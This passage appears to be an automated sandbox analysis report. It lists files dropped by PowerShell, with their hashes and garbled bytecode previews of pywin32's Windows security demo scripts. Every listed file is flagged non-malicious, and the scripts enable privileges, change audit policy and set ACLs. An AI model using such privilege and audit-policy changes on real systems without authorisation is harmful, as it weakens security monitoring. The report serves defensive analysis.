                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.d...e.j.f.f.Z.e.....Z.e...e.e.j...Z.e...e.d.e.....e...d.e.j...Z.e...e.e.j...Z.e.D.].Z.e.e...d.e.......q^e...e.....d.S.)......N)...ACCESS_MODE..ACE_FLAGS..TRUSTEE_FORM..TRUSTEE_TYPE..Z.SeEnableDelegationPrivilege).Z.ntsecurityconZ.win32apiZ.win32conZ.win32fileZ.win32securityZ.security_enumsr....r....r....r....Z.LookupPrivilegeValueZ.SE_SECURITY_NAMEZ.SE_PRIVILEGE_ENABLEDZ.SE_CREATE_PERMANENT_NAMEZ.new_privs..GetCurrentProcess..phZ.OpenProcessTokenZ.TOKEN_ALL_ACCESS..thZ.AdjustTokenPrivilegesZ.GetPolicyHandleZ.POLICY_ALL_ACCESSZ.policy_handleZ!LsaEnumerateAccountsWithUserRightZ.SE_RESTORE_NAMEZ.sidlistZ.sid..printZ.LookupAccountSidZ.LsaClose..r....r.....wC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/security/list_rights.py..<module>....s8....................................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1588
                                                                                                                                                                                                            Entropy (8bit):5.507000924637178
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CYDX1XUEP9txuaWcdL2af1XIlukMldqVjsDl50sVSGSriw2C5WIHNWP0kLJSoos9:CYj1f0aWcZ2i1ImqoIESmwBlMLJwA
                                                                                                                                                                                                            MD5:0EA083F1AE67C55BAC52B307A450F2B5
                                                                                                                                                                                                            SHA1:E31F1651AD2F4650A9DE15705646D3D9CDC4BB77
                                                                                                                                                                                                            SHA-256:31050E627E1D901B2FF83105FA40BD4E7E2E6AA2BFE8D818FD556F254ABEA641
                                                                                                                                                                                                            SHA-512:8A3E76F1E669F7D8D1E4BFDF999A75E282EC9355CC31BC92243CD45E854A4CFEE01A8C92482CEE8B845E9C5E53BFC4625D8BF77A2118911FDAECC83DAF3622BD
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s^...d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.e.d.k.r-e.....d.S.d.S.)......N)...*)...NetUserModalsGet)...LookupAccountSidc....................C...sJ...t.....}.|...t.d.....t.t.|.f...D.].\.}.}.|...|.|.....q.t.|.|...\.}.}.}.|.S.).N.....)...pywintypes..SID..InitializeZ.SECURITY_NT_AUTHORITY..enumerateZ.SECURITY_BUILTIN_DOMAIN_RID..SetSubAuthorityr....)...TargetComputer..Rid..sid..i..r..name..domain..typ..r.....{C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/security/localized_names.py..LookupAliasFromRid....s................r....c....................C...sv...t.|.d...}.|.d...}.|.....}.t.....}.|...|.....|.d.......t.|...D.].}.|...|.|...|.......q.|...|.|.....t.|.|...\.}.}.}.|.S.).Nr....Z.domain_id.....).r....Z.GetSubAuthorityCountr....r....r....Z.GetSidIdentifierAuthority..ranger....Z.GetSubAuthorityr....).r....r....Z.umi2Z.domain_sidZ.SubAuthorityCountr....r....r....r....r.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):587
                                                                                                                                                                                                            Entropy (8bit):5.453760835141936
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C16aKTJfpOdFSjzLxbc3HXAEnj/3Anl/CR/2IaUDnHWun:C2ROdFSjzu3HXAEjPAnq2qVn
                                                                                                                                                                                                            MD5:32744875FDD9304448C4B5B754239054
                                                                                                                                                                                                            SHA1:B4CEF520DE22DD267D1237C0DE524C7283F607D0
                                                                                                                                                                                                            SHA-256:3B7ACEAECDA26D07F27EC2522683440743CCE701484B50F0902A5B233A4754B4
                                                                                                                                                                                                            SHA-512:2C7D07142B9057B7470EBB8769A61C45B3007447087E9AD2B464E964995AB16960734F336319B59C0EAA91EB3163E42163CDF08389055204FD28DA8518B1FABE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g"........................@...s\...d.d.l.Z.d.d.l.Z.e...d.d.d.d...Z.e...e.j.e.....e.d.....e...e.d...Z.e.e.....e...e.j.e.....d.S.)......Nz=Waiting for you change Audit policy in Management console ...i..;).Z.win32eventZ.win32security..CreateEventZ.evtZ#LsaRegisterPolicyChangeNotificationZ"PolicyNotifyAuditEventsInformation..print..WaitForSingleObjectZ.ret_codeZ%LsaUnregisterPolicyChangeNotification..r....r.....wC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/security/lsaregevent.py..<module>....s............................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):505
                                                                                                                                                                                                            Entropy (8bit):5.400774594944541
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C1JeUYXASrIFF9kqDufCPZqBqNqQJ+J/2IaUDFuZBik:CtYk56fAZqwJS2wEik
                                                                                                                                                                                                            MD5:D043B4B377566B7EBCAD9A9F4A0E5DA7
                                                                                                                                                                                                            SHA1:1EAE86F63CCACDE9FAB013D34E8A4BA70E86B7DA
                                                                                                                                                                                                            SHA-256:C947230886683E1C884038CF98992E290D7EA82FB09D1BF16430DBF00D0D5395
                                                                                                                                                                                                            SHA-512:EC0B91797C7DFF5583723C778CB151C493CA9E3F1120903BEB54BE60C7FFDA1262B4272E2B6AD56AAF00EE970A2C02B780F1934F845143E86B92B848247B196A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s`...d.d.l.Z.e...d.e.j...Z.d.Z.d.Z.e...e.e.e.....e...e.e...Z.e.e.k.s"J...e...e.e.d.....e...e.....d.S.)......N..z.some sensitive data..tmp).Z.win32securityZ.GetPolicyHandleZ.POLICY_ALL_ACCESSZ.policy_handleZ.privatedataZ.keynameZ.LsaStorePrivateDataZ.LsaRetrievePrivateDataZ.retrieveddataZ.LsaClose..r....r.....tC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/security/lsastore.py..<module>....s......................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):885
                                                                                                                                                                                                            Entropy (8bit):5.513863529299352
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CwJ0c5MRjlmuhOI/QdSxjpb9A2GpzTisiS:CwJMtl/hOI4dijda2+CbS
                                                                                                                                                                                                            MD5:6E97BAD23E70F91B3F7DE39AF3908A45
                                                                                                                                                                                                            SHA1:22E75371BD8074450063580AFEA874C83D58CACC
                                                                                                                                                                                                            SHA-256:9415FCB3B9CB25AA62E7D069FD6A16AC27F40F8AF30148DEC0C1A9703F4D1DEA
                                                                                                                                                                                                            SHA-512:D3897BCB34C08EB7542760F91E9318F4EE0AB5B6A7F8DC056FB0FC8D3BF8427E3FA9D41D9F19506E6B706239D1DA33DA1DDECFB80620175C921DDD846594BFBA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g0........................@...sD...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d...Z.e.d.k.r e.d.e.......d.S.d.S.)......N)...*c....................C...s....z.t...t.....t.d...}.W.n#..t.j.y...}...z.|.d...t.j.k.r...t...t.....t...}.W.Y.d.}.~.n.d.}.~.w.w.t...|.t...\.}.}.t...|.....t...d.|...\.}.}.}.|.S.).N.....r....)...win32securityZ.OpenThreadToken..win32apiZ.GetCurrentThreadZ.TOKEN_QUERY..error..winerrorZ.ERROR_NO_TOKENZ.OpenProcessToken..GetCurrentProcessZ.GetTokenInformationZ.TokenUser..CloseHandleZ.LookupAccountSid)...tok..detailsZ.sid..attr..name..dom..typ..r.....}C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/security/query_information.py..GetDomainName....s............................r......__main__z.Domain name is).r....r....r....Z.ntsecurityconr......__name__..printr....r....r....r......<module>....s....................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1392
                                                                                                                                                                                                            Entropy (8bit):6.011077198729972
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CFvQY9CRFUnIhrqPFNDoBjn+pxxuvNx7QyruEFqg4S8odM0KDXW1HG9Y3x2+sy3e:CuY9CRencrk0K7gH7xKEozS8odYD5Y3s
                                                                                                                                                                                                            MD5:B4A04E0673082865FD834253C67094F5
                                                                                                                                                                                                            SHA1:E4A10A7421BB474090B86EBF6D90D5F3F2C42DE8
                                                                                                                                                                                                            SHA-256:EDB28A4921201B772B67446271AF9DA3C9B63580715615E746B711660D42E7A6
                                                                                                                                                                                                            SHA-512:DBEA6C201969CEDE4F487D8DC25F68DCFEF042B932D9238AF32551BB51A2B0EE7103C4FCB8567EE2414E1ED416FD9246BBDF8479667734C1589CDE77DD8B0C2B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s~...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e.j...e...r%e...e.....e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.f.Z.e.....Z.e...e.e.j.e.j.B...Z.e...e.d.e.....e...e.e.j...d...Z.e...e.j.d.d.e.j...Z.e...e.d.d.e.j...Z.e.. ..Z!e.."..Z#e#e!_"e..$..Z%e..&d.d...d...Z'e%.(e.j)e.j*e.j+B.e.....e#.,d.e%d.....e#.-e'd.....d.e!_.e!j"e#u.s.J...e../e.e.e!....d.S.).z.h:\tmp.reg.....N..Z.SYSTEMz.Power Users.....)0..fname..osZ.ntsecurityconZ.pywintypesZ.win32apiZ.win32conZ.win32security..path..isfile..removeZ.LookupPrivilegeValueZ.SE_SECURITY_NAMEZ.SE_PRIVILEGE_ENABLEDZ.SE_TCB_NAMEZ.SE_BACKUP_NAMEZ.SE_RESTORE_NAMEZ.new_privs..GetCurrentProcess..phZ.OpenProcessTokenZ.TOKEN_ALL_ACCESSZ.TOKEN_ADJUST_PRIVILEGES..thZ.AdjustTokenPrivilegesZ.GetTokenInformationZ.TokenUserZ.my_sidZ.RegOpenKey..HKEY_LOCAL_MACHINE..KEY_ALL_ACCESSZ.hklmZ.skeyZ.SECURITY_ATTRIBUTES..saZ.SECURITY_DESCRIPTOR..sdZ.ACLZ.aclZ.LookupAccountNameZ.pwr_sidZ.AddAcce
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1090
                                                                                                                                                                                                            Entropy (8bit):5.9309577711237385
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CJB0b4Y+O+kLFhNx7QuEFqg4SjgJMevphmf2Xrqyf7hTXi:CJBhO1LbH75EozSjJeP62bvfc
                                                                                                                                                                                                            MD5:DBED28047AEFB8E399C2472415C85377
                                                                                                                                                                                                            SHA1:24EBE17673D19D6045322CF573077424C0A3E47F
                                                                                                                                                                                                            SHA-256:C0143602EE0DEC7FA933E37FD1C6382EDDC5E39E3B9D182D4C8CEE35F5C923BF
                                                                                                                                                                                                            SHA-512:AB3DBE039CBB7BE13774F8469E186E6F5EFA88CEE31984E8C9C87F102011132765F0D9850DF275B0AFDC2F3AE35FA7109B2624042246232D8445EC6514B97B81
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e...d.e.j...e.j.f.e...d.e.j...e.j.f.f.Z.e.....Z.e...e.e.j.e.j.B...Z.e...e.d.e.....e...e.j.d.d.e.j...Z.e...e.d.....e...e.d.d.e.j...Z.e...d.d...d...Z.e.....Z.e...e.j.e.j.e.d.d.....e.....Z.e.. d.e.d.....e..!e.e.j"e.....d.S.)......N..z.SYSTEM\NOTMPz.SYSTEM\notmp..tmp.....)#Z.ntsecurityconZ.win32apiZ.win32conZ.win32securityZ.LookupPrivilegeValueZ.SE_SECURITY_NAMEZ.SE_PRIVILEGE_ENABLEDZ.SE_TCB_NAMEZ.new_privs..GetCurrentProcess..phZ.OpenProcessTokenZ.TOKEN_ALL_ACCESSZ.TOKEN_ADJUST_PRIVILEGES..thZ.AdjustTokenPrivilegesZ.RegOpenKey..HKEY_LOCAL_MACHINE..KEY_ALL_ACCESS..hkeyZ.RegCreateKeyZ.ACCESS_SYSTEM_SECURITYZ.notmpkeyZ.LookupAccountNameZ.tmp_sidZ.ACLZ.saclZ.AddAuditAccessAceZ.ACL_REVISIONZ.GENERIC_ALLZ.SECURITY_DESCRIPTOR..sdZ.SetSecurityDescriptorSaclZ.RegSetKeySecurityZ.SACL_SECURITY_INFORMATION..r....r.....wC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/security/r
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):497
                                                                                                                                                                                                            Entropy (8bit):5.553961726598998
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:C1EHrITJX1WXZKFD2/gl4gw0+l3ED/2IafkJv:CEHwspaKEbvb2S
                                                                                                                                                                                                            MD5:F23140B0E56EA2D857813B6911F37CD5
                                                                                                                                                                                                            SHA1:59500EE37F0FF0154E22602F60C18D6B009EC264
                                                                                                                                                                                                            SHA-256:33FAB890A47616AB6ED4A092CF854689ADB2F3DEF9547618F28578A6A180B824
                                                                                                                                                                                                            SHA-512:014BCB8D3AD9B5CCEFFE80EB073D826417327A3C802CE349B98B219D295FC8C8EFA9E6F40B7FF706F434534C988E7C6391E9081EFD4CA636BB3DA3400FD22144
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g!........................@...sR...d.d.l.Z.d.d.l.Z.e.....Z.e...d.d...d...Z.e...e.d.....e.j.....Z.e.e...d.e.......d.S.)......N....tmp).Z.pywintypesZ.win32securityZ.SECURITY_ATTRIBUTES..saZ.LookupAccountNameZ.tmp_sidZ.SetSecurityDescriptorOwnerZ.SECURITY_DESCRIPTORZ.GetSecurityDescriptorOwnerZ.sid..printZ.LookupAccountSid..r....r.....vC:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/security/sa_inherit.py..<module>....s..................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8436
                                                                                                                                                                                                            Entropy (8bit):5.9089555703774215
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:C77J6EgDq4qqzatcS8uJPd7r5gSxIjVqKH+v:e7JZcq4qqhMFqqKH+v
                                                                                                                                                                                                            MD5:2E1ACFA402A7D64D8DEAA30671A0E293
                                                                                                                                                                                                            SHA1:865D992CCD6D4B6DED8D1BDE8ADBCD659F738B82
                                                                                                                                                                                                            SHA-256:3C389547410E9BFD6927FBFD76746A58E5C3F033A0BB06C046427B3B21A82457
                                                                                                                                                                                                            SHA-512:F92CEE8EB77D1448ACB5D3EE70BD3FC8CB7241BBE665FC0097B3C32CBC14E43B6DE9A04BE43B772A34D0DDEC8D7E16D51C24CBD14580934D9E5177520133022F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g0&.......................@...sv...d.d.l.Z.d.d.l.Z.d.d.l.Z.G.d.d...d...Z.e.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d.d...Z.e.d d!..Z.e.d"d#d$..Z.e.d%d&d'd(d)d*d+d,d-..Z.e.d.d/d0d1d2d3d4d5d6d7d8d9..Z.e.d:d;..Z.e.d<d=d>d?d@dAdBdCdDdEdFdGdHdIdJdKdL..Z.e.dMdNdOdP..Z.e.dQdRdSdTdUdVdWdXdYdZd[d\d]d^d_d`dadbdcdddedfdgdhdidj..Z.e.dkdldmdndodpdqdrdsdtdu..Z.e.dvdwdxdydzd{d|..Z.e.d}d~d.d.d.d.d.d.d.d.d...Z.e.d.d.d.d.d.d.d.d.d.d...Z.e.d.d.d.d.d.d.d.d.d.d.d.d...Z.e.d.d.d.d...Z.e.d.d...Z.e.d.d.d.d.d.d.d...Z.e.d.d.d.d.d.d.d.d.d.d.d.d...Z.e.d.d.d.d.d...Z.e.d.d.d.d.d.d.d.d.d..Z.e.d.d.d.d.d.d.d.d.d.d.d.d.d..Z.e.d.d.d..Z.e.d.d.d.d.d.d.d.d.d..Z.e.d.d.d.d..Z.d.S.)......Nc....................@...s$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...Enumc....................G...s....|.D.]?}.z.t.t.|...}.W.n/..t.y:......z.t.t.|...}.W.n...t.y7......z.t.t.|...}.W.n...t.y4......t.d.|.......w.Y.n.w.Y.n.w.t.|.|.|.....q.d.S.).zuAccepts variable number of constant names that can be found in either.
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2012
                                                                                                                                                                                                            Entropy (8bit):5.972646593966918
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CkjPrKbBWXiiFi5rXL4SH7mEozSOMN9313ttqf62vGA1ryk3Va:CkjzX6bR7TO8l3ttqh117la
                                                                                                                                                                                                            MD5:36099DFC85AE2103C542A6B9D00BDDA2
                                                                                                                                                                                                            SHA1:4B16A416DC32B04B3089BA59AD9B33E0A59B4501
                                                                                                                                                                                                            SHA-256:522902F16D628FBF69035A438E845AD60E8A16709F6B0E2DFCCE568F211EF842
                                                                                                                                                                                                            SHA-512:9B28B183233D4A798E9BBEEA670EDA4F0FB3251FA52F205A8275033041DD25B6B23C013CE537334B0FEFB433D4A075B168BE1B0FF8179C1A3B2A679305F3011B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sL...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e...d.e.j...e.j.f.e...d.e.j...e.j.f.f.Z.e.....Z.e...e.e.j.e.j.B...Z.e...e.d.e...Z.e...e.e.j...d...Z.e...d.d...d...Z e...d.d...d...Z!e...d.d...d...Z"e..#..Z$e..%e$d...d...Z&e..'e&....e..(e&....e..)..Z*e*.+e.e.e.B.e.j,e"....e*.+e.e.e.B.e.j-e.....e...e&e.e.e.B.e.B.e.B.e e e*d.....e..%e&d...d...Z/e0e/....e..1e/e.e.e.B...Z2e2.3..Z4e2.5..Z6e4d.u.r.e..)..Z4e6d.u.r.e..)..Z6e4.7e4.8..e.j9e!....e4.7e4.8..e.j9e.....e4.:e4.8..e.j-e ....e6.;e4.8..e.j-e.d.d.....e...e/e.e.e.B.d.d.e4e6....e...e.d.e.....d.S.)......N)...ACL_REVISION_DS..CONTAINER_INHERIT_ACE..DACL_SECURITY_INFORMATION..GROUP_SECURITY_INFORMATION..OBJECT_INHERIT_ACE..OWNER_SECURITY_INFORMATION.#PROTECTED_DACL_SECURITY_INFORMATION..SACL_SECURITY_INFORMATION..SE_FILE_OBJECT..z.Power UsersZ.AdministratorsZ.EveryOneZ.sfaT)<..osZ.ntsecurityconZ.win32apiZ.win32conZ.win32fileZ.win32securityr....r....r....r...
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1699
                                                                                                                                                                                                            Entropy (8bit):5.981884318290583
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:Cvc1WngbzornU4AndLfH7PtgEozSLWQuMXEBK2fUO3333Zp:Ciz+nUR/77LWPfBH3333Zp
                                                                                                                                                                                                            MD5:1C117DCA84C38FD04934748FE6B46F70
                                                                                                                                                                                                            SHA1:4D00CF844CF90E8F9E8F72AFD6D9F935DBB4F9E2
                                                                                                                                                                                                            SHA-256:91B7C7274657A0770DC40F3379575DAE20226B0AA8F9395504EACC35FEEBCDCC
                                                                                                                                                                                                            SHA-512:E48204229DA1DE6863B925D91006832052EFD9360D8575A0B49F3E0AA0FF3475C796574141B2426A0320F8F9ADF3EF9D2CFC66D2DD1EEFDA4FC58A06C2C244E9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.d...e.j.f.f.Z.e.....Z.e...e.e.j.e.j.B...Z.e...e.d.e.....e.j.e.j.B.e.j.B.e.j.B.Z.e...e.e...Z.e.....Z.e.....Z e..!..Z"e..#..Z$e%d.e$.&..e$.'..e$.(......e..)e.e.j*..d...Z+e..,d.d...d...Z-e$..d.e d.....e$./d.e.d.....e$.0e-d.....e$.1e"d.....e..2e.e.e$....d.S.).z.h:\tmp.txt.....N..Z.SeEnableDelegationPrivilegez.relative, valid, size: ..tmp.....)3..fnameZ.ntsecurityconZ.win32apiZ.win32conZ.win32fileZ.win32securityZ.LookupPrivilegeValueZ.SE_SECURITY_NAMEZ.SE_PRIVILEGE_ENABLEDZ.SE_SHUTDOWN_NAMEZ.SE_TCB_NAMEZ.SE_RESTORE_NAMEZ.SE_TAKE_OWNERSHIP_NAMEZ.SE_CREATE_PERMANENT_NAMEZ.new_privs..GetCurrentProcess..phZ.OpenProcessTokenZ.TOKEN_ALL_ACCESSZ.TOKEN_ADJUST_PRIVILEGES..thZ.AdjustTokenPrivilegesZ.OWNER_SECURITY_INFORMATIONZ.GROUP_SECURITY_INFORMATIONZ.DACL_SECURITY_INFORMATIONZ.SACL_SECURITY_INFOR
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):804
                                                                                                                                                                                                            Entropy (8bit):5.711299673612705
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:CEW32a29XXkLjWMVBfAZUE8MLMHcWNcAzlcI2ty:Cn32auXULTAd8e5FElR2g
                                                                                                                                                                                                            MD5:D709B9E1A4A971A6A831467D45B687B2
                                                                                                                                                                                                            SHA1:4D3611C14E4D65625FA91F3252F698AF4AA34EB7
                                                                                                                                                                                                            SHA-256:10C941EA1C1BAA556BB316A9BF7211AFDD81823F142D17563CC95D8A4D43138D
                                                                                                                                                                                                            SHA-512:B36540760F448B95D03A7F871FC5546281514F020F3C10D3FBE8B0DBA94883E49C90A0A2208CD1187001B77D1E7A318F7487FC6BDAA89757D359501582D5B1D3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e...d.e.j...Z.e...e.e.j...Z.e.e.....e.e.d.....Z.e.j.e.j.B.e.e.j.<.e.j.e.j.B.e.e.j.<.e.j.e.j.B.e.e.j.<.e...e.e.j.d.e.f.....e...e.....d.S.)......NZ.rupole.....).Z.ntsecurityconZ.win32apiZ.win32fileZ.win32securityZ.GetPolicyHandleZ.POLICY_ALL_ACCESSZ.policy_handleZ.LsaQueryInformationPolicyZ.PolicyAuditEventsInformationZ.event_audit_info..print..listZ.new_audit_infoZ.POLICY_AUDIT_EVENT_SUCCESSZ.POLICY_AUDIT_EVENT_FAILUREZ.AuditCategoryPolicyChangeZ.AuditCategoryAccountLogonZ.AuditCategoryLogonZ.LsaSetInformationPolicyZ.LsaClose..r....r.....{C:\Users\Administrator\AppData\Local\Programs\Python\Python310-32\Lib\site-packages\win32/Demos/security/set_policy_info.py..<module>....s(...........................................
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2921
                                                                                                                                                                                                            Entropy (8bit):5.98339005144099
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CWR67l453ZpkDJH4z1b2jXSs7NHwRO7BD1/cLSkqigH2Z7NLMLKpY11iG5Z0W335:C66h4NXkJuQrdRBiWkqWL9m11i0F333p
                                                                                                                                                                                                            MD5:39B107A53DCD8DC2043A49685288E02A
                                                                                                                                                                                                            SHA1:C81E96D8C2316B2CEBBC70EB1B8F53F813F5852E
                                                                                                                                                                                                            SHA-256:5398A9BC56DDBDABEB1529415A1103A57478CC51D48E5C25240E5D88FDA6739A
                                                                                                                                                                                                            SHA-512:1195ADE599DE4F8A0DF3788D5A3070445A454F1C30DD19326668000AC7B83CDE93A994164E7EBF566526F42BED8A0C03A1156B4BDD54B02930A767DF63195543
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sP...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.e...d.e.j...e.j.f.f.Z.e.j.e.j.B.e.j.B.e.j.B.Z.e.....Z.e...e.j.d.e...Z.e...e.e.j...Z.e.. e.e.j!..Z"e#d.d...e"D.....Z$e..%e.d.e$..Z&e..'..Z(e(d.k.r.e)d.e(....e.. e.e.j*..d...Z+e..,d.d...d...Z-e...e.j.e.j.B.d.e...Z.e../e.e...Z0e0.1..Z2e2d.u.r.e..3..Z2e0.4..Z5e5d.u.r.e..3..Z5e2.6..Z7e5.6..Z8e2.9e2.:..e.j.e.j;B.e+....e5.<e5.:..e.j=e+d.d.....e0.>d.e2d.....e0.?d.e5d.....e0.@e-d.....e0.Ae-d.....e..Be.e.e0....e../e.e...ZCeC.1...6..e7d...k...rRe)d.....eC.4...6..e8d...k...rae)d.....e..Dd.eC.E....d...d.k...rre)d.....e..Dd.eC.F....d...d.k...r.e)d.....e0.?d.d.d.....e..Be.e.j.e0....e../e.e.j...ZGeG.4..d.u...r.e)d.....d.S.d.S.)......N..c....................c...s......|.].}.|.d...t.j.f.V...q.d.S.).r....N)...win32con..SE_PRIVILEGE_E
                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2471
                                                                                                                                                                                                            Entropy (8bit):6.035650662290096
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:CYF/thgiOxAPqWEbPnxSVdNH7AO7BD1/cLSkRogMMpY1LcmR5Zio2Z3333333b+0:CYF/P2APqWETiP7HBiWk1Zm1Lcmjgd3p
                                                                                                                                                                                                            MD5:25658AF279FF0DD541144FADAB337041
                                                                                                                                                                                                            SHA1:285D6E13C1A16367DC77E371A94AC35933314CC4
                                                                                                                                                                                                            SHA-256:00A24E0035A2C60988723A8A2BA5E0D72997DDA6694C76F3A679C3808FE9EE02
                                                                                                                                                                                                            SHA-512:1ACFA736046C14B25C07C63B050BE84D8F39BDDEA6F9DFF437C2DE0EB076938DABEC8411CC28472ED4D4A9C91763D2A9689C54DFA5C491AED0858B187724F841
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
